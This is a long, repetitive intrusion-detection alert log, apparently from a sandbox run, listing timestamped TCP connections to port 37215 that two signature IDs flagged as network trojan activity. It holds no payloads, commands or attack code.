                Timestamp:05/29/24-15:15:20.576058
                SID:2829579
                Source Port:50566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519268
                SID:2829579
                Source Port:51390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042949
                SID:2829579
                Source Port:57346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.564758
                SID:2829579
                Source Port:36932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969724
                SID:2835222
                Source Port:58496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165795
                SID:2835222
                Source Port:45460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896135
                SID:2829579
                Source Port:56076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666113
                SID:2829579
                Source Port:42088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528352
                SID:2829579
                Source Port:44928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840944
                SID:2829579
                Source Port:53456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026681
                SID:2829579
                Source Port:48254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735040
                SID:2829579
                Source Port:59644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984805
                SID:2829579
                Source Port:56432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155108
                SID:2835222
                Source Port:42506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878136
                SID:2829579
                Source Port:44354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901027
                SID:2835222
                Source Port:37546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.794195
                SID:2829579
                Source Port:41616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.648857
                SID:2835222
                Source Port:57344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243033
                SID:2829579
                Source Port:43036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664132
                SID:2829579
                Source Port:37280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518881
                SID:2829579
                Source Port:36374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735353
                SID:2835222
                Source Port:33102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.279359
                SID:2829579
                Source Port:46680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659947
                SID:2835222
                Source Port:36360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331300
                SID:2835222
                Source Port:40416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992746
                SID:2829579
                Source Port:43652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660155
                SID:2829579
                Source Port:53048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898314
                SID:2829579
                Source Port:36056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.575826
                SID:2835222
                Source Port:52478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.034720
                SID:2835222
                Source Port:56496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967362
                SID:2829579
                Source Port:50494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100503
                SID:2829579
                Source Port:48468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025478
                SID:2829579
                Source Port:44626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325452
                SID:2835222
                Source Port:44922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438113
                SID:2829579
                Source Port:45676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466161
                SID:2835222
                Source Port:37522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.827279
                SID:2835222
                Source Port:49586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178862
                SID:2835222
                Source Port:48832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359651
                SID:2835222
                Source Port:48158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786132
                SID:2835222
                Source Port:54208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210071
                SID:2829579
                Source Port:48792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.794564
                SID:2835222
                Source Port:40252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227334
                SID:2829579
                Source Port:40446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670738
                SID:2835222
                Source Port:37504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209599
                SID:2829579
                Source Port:46286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666339
                SID:2829579
                Source Port:43254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163956
                SID:2829579
                Source Port:59276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896984
                SID:2829579
                Source Port:43856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175556
                SID:2829579
                Source Port:44318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.179624
                SID:2829579
                Source Port:46714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226522
                SID:2835222
                Source Port:49316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508706
                SID:2835222
                Source Port:35068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.920998
                SID:2835222
                Source Port:58572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969575
                SID:2829579
                Source Port:42808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363061
                SID:2835222
                Source Port:44094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966589
                SID:2835222
                Source Port:44530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265814
                SID:2835222
                Source Port:33960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521689
                SID:2829579
                Source Port:60886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.289043
                SID:2829579
                Source Port:48706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.970004
                SID:2829579
                Source Port:38232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025039
                SID:2829579
                Source Port:36024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977682
                SID:2835222
                Source Port:47162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.161280
                SID:2829579
                Source Port:49524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612087
                SID:2829579
                Source Port:57726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.869253
                SID:2829579
                Source Port:56280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243454
                SID:2829579
                Source Port:55306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631622
                SID:2829579
                Source Port:41040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652523
                SID:2835222
                Source Port:52484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.808589
                SID:2835222
                Source Port:50694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164921
                SID:2835222
                Source Port:57628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.724559
                SID:2829579
                Source Port:49188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.232350
                SID:2829579
                Source Port:43374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.441067
                SID:2829579
                Source Port:41696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675343
                SID:2829579
                Source Port:57494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883590
                SID:2829579
                Source Port:49896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910860
                SID:2835222
                Source Port:36528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502877
                SID:2835222
                Source Port:54816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316357
                SID:2835222
                Source Port:52858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237376
                SID:2835222
                Source Port:50958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.090995
                SID:2829579
                Source Port:42590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266418
                SID:2829579
                Source Port:38774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.232162
                SID:2829579
                Source Port:50118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436137
                SID:2835222
                Source Port:38404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369515
                SID:2829579
                Source Port:34708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897726
                SID:2829579
                Source Port:32924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528422
                SID:2835222
                Source Port:45414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.907589
                SID:2835222
                Source Port:36890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339139
                SID:2835222
                Source Port:52406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776844
                SID:2829579
                Source Port:36242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572936
                SID:2835222
                Source Port:42412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965348
                SID:2829579
                Source Port:50732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.022298
                SID:2835222
                Source Port:34086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860480
                SID:2829579
                Source Port:41506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910708
                SID:2835222
                Source Port:32978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025220
                SID:2829579
                Source Port:54882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510182
                SID:2835222
                Source Port:49996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321136
                SID:2835222
                Source Port:43476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440401
                SID:2829579
                Source Port:42492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227573
                SID:2835222
                Source Port:35414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799765
                SID:2829579
                Source Port:39080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165919
                SID:2829579
                Source Port:44644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731934
                SID:2829579
                Source Port:47770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443970
                SID:2835222
                Source Port:50080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878655
                SID:2835222
                Source Port:58516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.387250
                SID:2829579
                Source Port:49200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839657
                SID:2829579
                Source Port:56626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685573
                SID:2835222
                Source Port:60018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.220833
                SID:2829579
                Source Port:38582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964221
                SID:2835222
                Source Port:38626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.568300
                SID:2829579
                Source Port:34716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659912
                SID:2835222
                Source Port:36770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.168748
                SID:2829579
                Source Port:48906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909329
                SID:2829579
                Source Port:60872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335138
                SID:2829579
                Source Port:37966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.172175
                SID:2829579
                Source Port:44102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154911
                SID:2829579
                Source Port:37300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.475211
                SID:2835222
                Source Port:56882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.911137
                SID:2835222
                Source Port:55754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339299
                SID:2835222
                Source Port:35624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981031
                SID:2829579
                Source Port:42128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.454242
                SID:2829579
                Source Port:55000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881825
                SID:2829579
                Source Port:45250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663422
                SID:2835222
                Source Port:35602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958256
                SID:2829579
                Source Port:44050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778306
                SID:2835222
                Source Port:46002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716359
                SID:2835222
                Source Port:42398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870052
                SID:2829579
                Source Port:34662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076302
                SID:2835222
                Source Port:35976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225535
                SID:2835222
                Source Port:54432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981513
                SID:2829579
                Source Port:57758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505309
                SID:2835222
                Source Port:43180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231141
                SID:2829579
                Source Port:33974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784006
                SID:2835222
                Source Port:42740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.704955
                SID:2829579
                Source Port:46772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165844
                SID:2829579
                Source Port:51864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022047
                SID:2835222
                Source Port:43004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654121
                SID:2829579
                Source Port:56362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415608
                SID:2829579
                Source Port:49520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.971693
                SID:2829579
                Source Port:46132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375269
                SID:2829579
                Source Port:50740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.718502
                SID:2835222
                Source Port:55678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653663
                SID:2829579
                Source Port:56068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.905035
                SID:2829579
                Source Port:48796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.589642
                SID:2835222
                Source Port:35622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386149
                SID:2835222
                Source Port:39784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.850234
                SID:2835222
                Source Port:34972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223067
                SID:2835222
                Source Port:57356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287621
                SID:2829579
                Source Port:34002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873392
                SID:2829579
                Source Port:41476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.144894
                SID:2835222
                Source Port:34416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321117
                SID:2829579
                Source Port:57300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786281
                SID:2835222
                Source Port:56390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.587122
                SID:2835222
                Source Port:43240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.026287
                SID:2829579
                Source Port:48152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.596749
                SID:2835222
                Source Port:57080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024623
                SID:2829579
                Source Port:48822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814500
                SID:2835222
                Source Port:37966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.851304
                SID:2835222
                Source Port:53498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639729
                SID:2835222
                Source Port:32828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784705
                SID:2829579
                Source Port:54254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520320
                SID:2835222
                Source Port:43346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859276
                SID:2835222
                Source Port:36584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.796989
                SID:2829579
                Source Port:43208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.964100
                SID:2829579
                Source Port:43912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.632084
                SID:2835222
                Source Port:60324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856920
                SID:2835222
                Source Port:36250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177343
                SID:2829579
                Source Port:35072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644820
                SID:2835222
                Source Port:50384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276197
                SID:2829579
                Source Port:43490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381271
                SID:2829579
                Source Port:60424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882950
                SID:2829579
                Source Port:41834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.967983
                SID:2835222
                Source Port:46840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233766
                SID:2835222
                Source Port:38434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.608341
                SID:2835222
                Source Port:36900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782756
                SID:2829579
                Source Port:34484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.895789
                SID:2829579
                Source Port:59648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.145011
                SID:2835222
                Source Port:34990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.809670
                SID:2835222
                Source Port:34404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335141
                SID:2829579
                Source Port:53770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783944
                SID:2829579
                Source Port:35350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176511
                SID:2835222
                Source Port:47652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.770285
                SID:2829579
                Source Port:34696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420245
                SID:2829579
                Source Port:43204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.723486
                SID:2835222
                Source Port:41794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.943142
                SID:2835222
                Source Port:60890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980175
                SID:2835222
                Source Port:36188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560199
                SID:2829579
                Source Port:50618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620194
                SID:2829579
                Source Port:38160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042741
                SID:2829579
                Source Port:50066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.910016
                SID:2835222
                Source Port:37382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.372288
                SID:2835222
                Source Port:53778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943936
                SID:2835222
                Source Port:40660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.468805
                SID:2829579
                Source Port:47786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.546738
                SID:2829579
                Source Port:41888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.733318
                SID:2829579
                Source Port:39398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617480
                SID:2829579
                Source Port:35002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.872826
                SID:2835222
                Source Port:37926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738437
